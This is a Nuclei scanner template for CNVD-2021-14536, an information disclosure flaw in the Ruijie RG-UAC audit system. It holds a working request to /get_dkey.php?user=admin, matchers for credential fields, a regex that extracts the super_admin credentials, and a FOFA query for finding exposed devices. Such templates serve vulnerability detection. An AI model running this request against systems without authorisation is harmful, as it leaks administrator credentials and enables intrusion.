id: CNVD-2021-14536

info:
  name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure
  author: daffainfo
  severity: high
  description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.
  reference:
    - https://www.adminxe.com/2163.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    fofa-query: title="RG-UAC登录页面"
  tags: ruijie,cnvd,cnvd2021,disclosure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/get_dkey.php?user=admin"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"pre_define"'
          - '"auth_method"'
          - '"name"'
          - '"password"'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":'

# Enhanced by mp on 2022/03/28